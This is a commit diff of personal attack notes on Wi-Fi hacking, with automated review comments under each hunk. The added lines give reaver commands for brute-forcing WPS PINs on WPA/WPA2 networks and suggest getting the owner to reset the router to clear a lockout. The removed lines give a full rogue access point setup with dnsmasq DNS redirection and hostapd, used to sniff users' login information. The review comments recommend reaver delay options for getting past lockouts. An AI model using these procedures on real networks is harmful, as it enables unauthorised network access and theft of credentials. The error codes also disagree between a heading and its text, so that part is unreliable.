2 Commits 4d45b3dc08 ... 02a34264e6

Author SHA1 Message Date
  golem 02a34264e6 added more notes 2 months ago
  golem 4d45b3dc08 added notes 2 months ago
1 changed file with 18 additions and 60 deletions
NetworkHacking.org

@@ -208,7 +208,7 @@ of the connected clients, instead of the mac address of our network interface:
 
 *** WPA/WPA2
 
-**** Without a wordlist
+**** Without a wordlist (WPS)
 
 To try to crack a WPA/WPA2 network without using a wordlist, we can exploit the
 WPS authentication system, if it's misconfigured.
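Review bot: the last context line of this hunk still says the WPS system can be exploited "if it's misconfigured" without saying what the misconfiguration is, so the new "(WPS)" qualifier in the heading only half closes the gap. Suggest naming the precondition directly, e.g. "if WPS is enabled with PIN registration allowed and the AP does not lock out after failed attempts", since the "Bypassing WPS Lock" note added later in this same commit depends on exactly that condition.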
@@ -228,9 +228,24 @@ and to crack the network, we first need to associate with the network:
 and then, we can bruteforce the WPS pin:
 
 #+BEGIN_SRC bash
-  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv --no-associate
+  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv -A
 #+END_SRC
 
+***** Bypassing 0x2 and 0x3 errors
+
+In case we get 0x3 and 0x4 errors in reaver, we can add the ~-N~ argument, to
+stop it from sending NACK messages, the end command would be like this:
+
+#+BEGIN_SRC bash
+  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -A -N
+#+END_SRC
+
+***** Bypassing WPS Lock
+
+We exploit WPS by bruteforcing its pin, this means we try every possible pin,
+some routers lock after a number of failed attemps. The solution is to either
+reset the router, or to get the user to reset their router.
+
 **** With a wordlist
 
 First, we need to capture the handshake, to do that, we just need to run
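Review bot: the new subsection heading says "Bypassing 0x2 and 0x3 errors" but its first sentence says "In case we get 0x3 and 0x4 errors"; one of the two is wrong, pick the codes reaver actually reports and use them in both places. Two smaller points: "attemps" in the WPS Lock paragraph should be "attempts", and "reset the router, or get the user to reset their router" is not something the attacker controls. Since reaver has options for this case (`-l`/`--lock-delay` to wait when the AP locks, `-r`/`--recurring-delay` to pause every N pins, `-d`/`--delay` between attempts), it would be more useful to document those as the mitigation than to rely on the owner rebooting. The `--no-associate` to `-A` change is fine, it is the short form of the same flag.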
@@ -416,64 +431,7 @@ need to first, flush iptables:
 	iptables -p FORWARD ACCEPT
 #+end_src
 
-We need a dnsmasq configuration file:
-
-#+begin_src text
-	interface=[interface_name]
-	dhcp-range=[ip_range_given_to_clients]
-	dhcp-option=3,[gateway_ip_address]
-	dhcp-option=6,[dns_server_address]
-	address=/#/[address_to_redirect_to]
-#+end_src
-
-For example:
-
-#+begin_src text
-	interface=wlan0
-	dhcp-range=10.0.0.10,10.0.0.100,8h
-	dhcp-option=3,10.0.0.1 # computer ip address
-	dhcp-option=6,10.0.0.1
-	address=/#/10.0.0.1
-#+end_src
-
-And we can run dnsmasq like this:
-
-#+begin_src bash
-	dnsmasq -C [config_file_location]
-#+end_src
-
-And we also need a configuration file for hostapd:
-
-#+begin_src text
-	interface=[interface_name]
-	ssid=[ssid]
-	channel=[channel]
-	driver=[driver]
-#+end_src
-
-For example:
-
-#+begin_src text
-	interface=wlan0
-	ssid=wifi
-	channel=1
-	driver=nl80211
-#+end_src
-
-And we have now to execute hostapd:
-
-#+begin_src bash
-  hostapd [config_file] -B
-#+end_src
-
-When hostapd is running, we must give an IP addres to our interface name, which
-in previous examples was wlan0:
-
-#+begin_src bash
-  ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
-#+end_src
-
-And now, we can sniff the login information with wireshark.
+*** WPA/WPA2 Enterprise
 
 ** Post-Connection Attacks
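Review bot: this hunk deletes the entire fake access point procedure (dnsmasq config, hostapd config, assigning the interface address, sniffing with wireshark) and replaces it with the empty heading "*** WPA/WPA2 Enterprise". If that material was moved elsewhere the commit message should say so; if it was intentionally dropped, the empty heading should either get a body or be left out until the Enterprise notes exist. Unrelated but visible in the leading context: `iptables -p FORWARD ACCEPT` uses the lowercase protocol match flag, the policy flag is uppercase, so it should read `iptables -P FORWARD ACCEPT`.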